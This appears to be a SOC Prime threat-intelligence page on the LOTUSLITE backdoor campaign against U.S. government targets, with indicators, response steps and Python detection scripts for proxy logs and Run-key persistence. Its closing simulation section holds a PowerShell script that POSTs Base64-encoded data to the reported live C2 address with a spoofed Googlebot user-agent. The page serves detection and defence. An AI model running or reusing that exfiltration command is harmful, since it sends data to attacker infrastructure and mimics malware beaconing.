SOC Prime Bias: Critical

16 Jan 2026 13:42 UTC

LOTUSLITE Campaign: Targeted Espionage Driven by Geopolitical Narratives

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Acronis TRU observed a targeted espionage operation aimed at U.S. government organizations that delivered a malicious DLL backdoor, LOTUSLITE, inside a politically themed ZIP archive. A companion loader executable side-loads the DLL, after which the backdoor beacons to a hard-coded C2 endpoint over HTTPS while spoofing a Googlebot user-agent. The operators establish persistence by creating a dedicated ProgramData directory and adding a Run registry entry. Based on overlapping tradecraft, the activity was linked to Mustang Panda.

Investigation

Analysts unpacked the ZIP and identified the loader binary (Maduro to be taken to New York.exe) alongside the weaponized DLL (kugou.dll). The analysis documented the DLL sideloading flow, beaconing behavior, mutex usage, and the exact persistence artifacts created on the host. Infrastructure review attributed communications to a single IP (172.81.60.97) and a spryt.net-hosted domain, reportedly hosted in Phoenix, Arizona. Attribution to Mustang Panda was assessed with moderate confidence due to shared tactics and infrastructure patterns.

Mitigation

Acronis detections relied on SHA-256 hashes for the malicious binaries and highlighted the specific ProgramData persistence folder and Run key location. Network controls should flag outbound HTTPS connections to the identified IP/domain when paired with a Googlebot user-agent string. Reduce persistence by preventing execution of unknown binaries from ProgramData and removing the associated Run registry entry when discovered.
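The network control described above (flag outbound requests to the reported C2 address, and treat a crawler user-agent leaving a workstation as suspicious in its own right, since Googlebot traffic is inbound by nature) can be expressed as a small detection pass over proxy records. The following is an added example written for this page, not Acronis or SOC Prime code. It assumes a constructed tab-separated proxy log format (time, client IP, method, URL, status, user-agent); the only indicator taken from the report is the IP 172.81.60.97, because the spryt.net-hosted domain is not named on the page.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicator from the Acronis TRU report summarised on this page. The
# spryt.net-hosted domain is not named on the page, so only the IP is listed.
C2_IPS = {"172.81.60.97"}

# A crawler user-agent has no legitimate reason to originate from an internal
# workstation; an outbound request carrying one is suspicious on its own.
CRAWLER_UA = re.compile(r"Googlebot", re.IGNORECASE)

# Constructed sample proxy log (tab-separated: time, client, method, url, status, user-agent).
SAMPLE_LOG = """\
2026-01-16T13:40:01Z\t10.20.30.41\tGET\thttps://www.example.com/news\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64)
2026-01-16T13:40:05Z\t10.20.30.41\tPOST\thttps://172.81.60.97/receive\t200\tGooglebot
2026-01-16T13:41:10Z\t10.20.30.42\tPOST\thttps://198.51.100.7/api\t200\tGooglebot/2.1 (+http://www.google.com/bot.html)
2026-01-16T13:41:12Z\t10.20.30.43\tGET\thttps://www.example.org/\t200\tcurl/8.4.0
"""


def parse_line(line):
    """Split one constructed log line into a record dict."""
    ts, client, method, url, status, ua = line.rstrip("\n").split("\t", 5)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "ua": ua}


def is_internal(ip):
    """RFC 1918 / loopback / link-local sources count as internal clients."""
    return ipaddress.ip_address(ip).is_private


def evaluate(rec):
    """Return the list of reasons this record should alert (empty if benign)."""
    reasons = []
    host = urlparse(rec["url"]).hostname or ""
    if host in C2_IPS:
        reasons.append("known LOTUSLITE C2 address")
    if CRAWLER_UA.search(rec["ua"]) and is_internal(rec["client"]):
        reasons.append("crawler user-agent from internal client")
    return reasons


def detect(log_text):
    """Run the two checks over every non-empty line and collect alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        reasons = evaluate(rec)
        if reasons:
            alerts.append({"client": rec["client"], "url": rec["url"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The user-agent check only works where the header is visible: for the HTTPS beaconing the report describes, that means TLS inspection at the proxy or endpoint-side telemetry, otherwise only the destination-based check applies. The second sample line shows why the crawler heuristic matters: it fires on a different destination than the published IP, which is what you want once the operators rotate infrastructure.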

Response

Immediately isolate affected endpoints, capture volatile data, and preserve the malicious binaries for analysis. Remove the created ProgramData folder and delete the corresponding Run registry value to break persistence. Block connectivity to the C2 IP and domain, and update endpoint detections with the provided file hashes and mutex indicator. Finally, conduct an environment-wide hunt for additional hosts exhibiting the same loader and DLL signatures.
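For the environment-wide hunt, the persistence artifact is the practical pivot: the report says the backdoor adds a Run registry entry and drops into a dedicated ProgramData directory, so any Run value whose executable sits under ProgramData deserves review. The following added example (not part of the original page or of Acronis tooling) triages text collected with `reg query ... /s` from many hosts and flags such entries. The value name and folder for the LOTUSLITE entry are placeholders, because the page does not give them; that the Run value points at the loader executable is an assumption made for the sample.

```python
import re

# Constructed sample of `reg query` output for both Run keys. The LOTUSLITE
# value name and ProgramData folder are PLACEHOLDERS (not given on the page);
# pointing the value at the loader binary is an assumption for this sample.
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    PLACEHOLDER_VALUE    REG_SZ    C:\ProgramData\PLACEHOLDER_DIR\Maduro to be taken to New York.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VendorAgent    REG_SZ    "C:\Program Files\Vendor\agent.exe" --svc
"""

KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\.*$")
# reg query pads columns with runs of spaces: <name>    <type>    <data>
VALUE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")
EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)

# Locations where auto-start executables are unexpected on a managed host.
SUSPECT_ROOTS = ("c:\\programdata\\",)


def executable_path(data):
    """Pull the executable out of a Run value's data, quoted or not.

    Unquoted paths may contain spaces (the loader name on this page does), so
    an unquoted value is cut at the first '.exe' rather than the first space.
    """
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = EXE_RE.search(data)
    return data[:m.end()] if m else data.split(" ", 1)[0]


def parse_run_keys(text):
    """Turn reg query text into a list of {key, name, type, exe} entries."""
    entries = []
    key = None
    for line in text.splitlines():
        if KEY_RE.match(line):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            name, vtype, data = m.groups()
            entries.append({"key": key, "name": name, "type": vtype,
                            "exe": executable_path(data)})
    return entries


def triage(text):
    """Return the Run entries whose executable lives under a suspect root."""
    return [e for e in parse_run_keys(text)
            if e["exe"].lower().startswith(SUSPECT_ROOTS)]


if __name__ == "__main__":
    for finding in triage(SAMPLE_REG_OUTPUT):
        print(f'{finding["key"]}\\{finding["name"]} -> {finding["exe"]}')
```

Run the same function over exports gathered from the whole fleet and the hits are the hosts to pull into the isolate/preserve/remove steps above; once the real value name and folder are known from your own sample, add them to the hunt as exact-match indicators alongside the path heuristic, and reconcile the flagged binaries against the published SHA-256 hashes before deleting anything.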

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker has compromised a workstation and installed the LOTUSLITE backdoor. To exfiltrate data while blending in with legitimate web-crawler traffic, the backdoor issues an HTTP POST to the hard-coded C2 server 172.81.60.97. It explicitly sets the User-Agent header to "Googlebot" to masquerade as a search-engine crawler, hoping to slip past perimeter defenses that whitelist such agents. The payload contains Base64-encoded exfiltrated data.

  • Regression Test Script:

    # LOTUSLITE C2 simulation – powershell
    $c2 = "http://172.81.60.97/receive"
    $ua = "Googlebot"
    $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
    $body = @{ "data" = $data }
    
    try {
        Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
        Write-Host "C2 request sent successfully."
    } catch {
        Write-Error "C2 request failed: $_"
    }

  • Cleanup Commands:

    # Remove any temporary files left under %TEMP% (the path separator was missing in the original)
    Remove-Item -Path "$env:TEMP\lotuslite_temp*" -ErrorAction SilentlyContinue
    # (No persistent services were created in this simulation)
    Write-Host "Cleanup complete."